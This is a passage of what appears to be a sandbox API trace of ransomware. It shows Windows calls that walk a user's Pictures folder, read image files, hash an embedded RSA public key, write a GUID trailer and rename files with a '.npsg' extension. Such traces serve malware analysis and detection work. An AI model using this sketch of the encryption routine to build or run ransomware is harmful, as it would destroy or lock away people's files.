KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.260] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.260] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.260] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.262] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.262] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.262] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.262] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.262] GetLastError () returned 0x0 [0239.262] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.262] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.262] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.262] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.262] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf4e0) returned 0x3b95d50 [0239.263] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b866c0 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d88 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86708 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d70 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d40 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d58 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.263] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d58 | out: hHeap=0x620000) returned 1 [0239.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d58 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400d40 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0239.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d58 | out: hHeap=0x620000) returned 1 [0239.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.265] GetCurrentThreadId () returned 0x5b4 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b87f78 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.265] GetCurrentThreadId () returned 0x5b4 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0239.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.266] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf4da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.266] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.266] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.266] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.267] CloseHandle (hObject=0x644) returned 1 [0239.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0239.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b89cd0 [0239.269] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\q348xqwvaV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lvw4jn8h\\q348xqwvav.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\q348xqwvaV.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lvw4jn8h\\q348xqwvav.png.npsg")) returned 1 [0239.271] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5902b270, ftCreationTime.dwHighDateTime=0x1d5be14, ftLastAccessTime.dwLowDateTime=0xd21c1510, ftLastAccessTime.dwHighDateTime=0x1d5c30b, ftLastWriteTime.dwLowDateTime=0xd21c1510, ftLastWriteTime.dwHighDateTime=0x1d5c30b, nFileSizeHigh=0x0, nFileSizeLow=0xf4da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q348xqwvaV.png", cAlternateFileName="Q348XQ~1.PNG")) returned 0 [0239.271] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.271] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.271] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.271] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\") returned="OHXi\\" [0239.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.271] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\") returned="2DVGfW2 wBKbSvaIoJ2e\\" [0239.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0239.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0239.272] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0239.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86708 [0239.272] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.272] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.272] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.272] PathFindFileNameW (pszPath="") returned="" [0239.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.272] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37d03500, ftCreationTime.dwHighDateTime=0x1d5c2ec, ftLastAccessTime.dwLowDateTime=0x98a7f9a0, ftLastAccessTime.dwHighDateTime=0x1d5b6ec, ftLastWriteTime.dwLowDateTime=0x98a7f9a0, ftLastWriteTime.dwHighDateTime=0x1d5b6ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.275] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37d03500, ftCreationTime.dwHighDateTime=0x1d5c2ec, ftLastAccessTime.dwLowDateTime=0x98a7f9a0, ftLastAccessTime.dwHighDateTime=0x1d5b6ec, ftLastWriteTime.dwLowDateTime=0x98a7f9a0, ftLastWriteTime.dwHighDateTime=0x1d5b6ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.275] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de8250, ftCreationTime.dwHighDateTime=0x1d5bc85, ftLastAccessTime.dwLowDateTime=0x4fead9a0, ftLastAccessTime.dwHighDateTime=0x1d5ba32, ftLastWriteTime.dwLowDateTime=0x4fead9a0, ftLastWriteTime.dwHighDateTime=0x1d5ba32, nFileSizeHigh=0x0, nFileSizeLow=0x171c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="beRk2Co7nrbQC1C4dKk.gif", cAlternateFileName="BERK2C~1.GIF")) returned 1 [0239.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0239.275] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\beRk2Co7nrbQC1C4dKk.gif") returned=".gif" [0239.275] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\OHXi\\beRk2Co7nrbQC1C4dKk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\berk2co7nrbqc1c4dkk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.276] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=94660) returned 1 [0239.276] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.279] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1719e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.279] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.281] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x171c4, lpOverlapped=0x0) returned 1 [0239.283] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.283] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.283] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.283] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.284] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.284] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.284] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.284] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.284] GetLastError () returned 0x0 [0239.284] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.284] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.284] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.284] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.285] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x171c0) returned 0x3b95d50 [0239.285] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86708 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d70 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86750 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d58 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d40 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ce8 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.286] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ce8 | out: hHeap=0x620000) returned 1 [0239.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d40 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88ce8 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.287] RtlAllocateHeap 